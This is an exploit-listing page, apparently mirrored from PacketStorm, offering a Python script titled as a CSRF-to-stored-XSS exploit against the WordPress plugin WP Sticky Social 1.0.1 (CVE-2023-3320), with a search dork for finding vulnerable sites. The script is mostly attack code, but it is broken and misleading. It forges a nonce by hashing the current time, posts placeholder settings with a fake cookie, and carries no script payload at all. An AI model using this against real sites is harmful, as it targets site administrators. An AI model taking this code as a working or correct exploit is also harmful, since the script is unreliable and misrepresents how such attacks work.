Share
## https://sploitus.com/exploit?id=PACKETSTORM:173048
# Exploit Title: WP Sticky Social 1.0.1 - Cross-Site Request Forgery to Stored Cross-Site Scripting (XSS)  
# Dork: inurl:~/admin/views/admin.php  
# Date: 2023-06-20  
# Exploit Author: Amirhossein Bahramizadeh  
# Category : Webapps  
# Vendor Homepage: https://wordpress.org/plugins/wp-sticky-social  
# Version: 1.0.1 (REQUIRED)  
# Tested on: Windows/Linux  
# CVE : CVE-2023-3320  
  
import requests  
import hashlib  
import time  
  
# Set the target URL  
url = "http://example.com/wp-admin/admin.php?page=wpss_settings"  
  
# Set the user agent string  
user_agent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"  
  
# Generate the nonce value  
nonce = hashlib.sha256(str(time.time()).encode('utf-8')).hexdigest()  
  
# Set the data payload  
payload = {  
"wpss_nonce": nonce,  
"wpss_setting_1": "value_1",  
"wpss_setting_2": "value_2",  
# Add additional settings as needed  
}  
  
# Set the request headers  
headers = {  
"User-Agent": user_agent,  
"Referer": url,  
"Cookie": "wordpress_logged_in=1; wp-settings-1=editor%3Dtinymce%26libraryContent%3Dbrowse%26uploader%3Dwp-plupload%26urlbutton%3Dfile; wp-settings-time-1=1495271983",  
# Add additional headers as needed  
}  
  
# Send the POST request  
response = requests.post(url, data=payload, headers=headers)  
  
# Check the response status code  
if response.status_code == 200:  
print("Request successful")  
else:  
print("Request failed")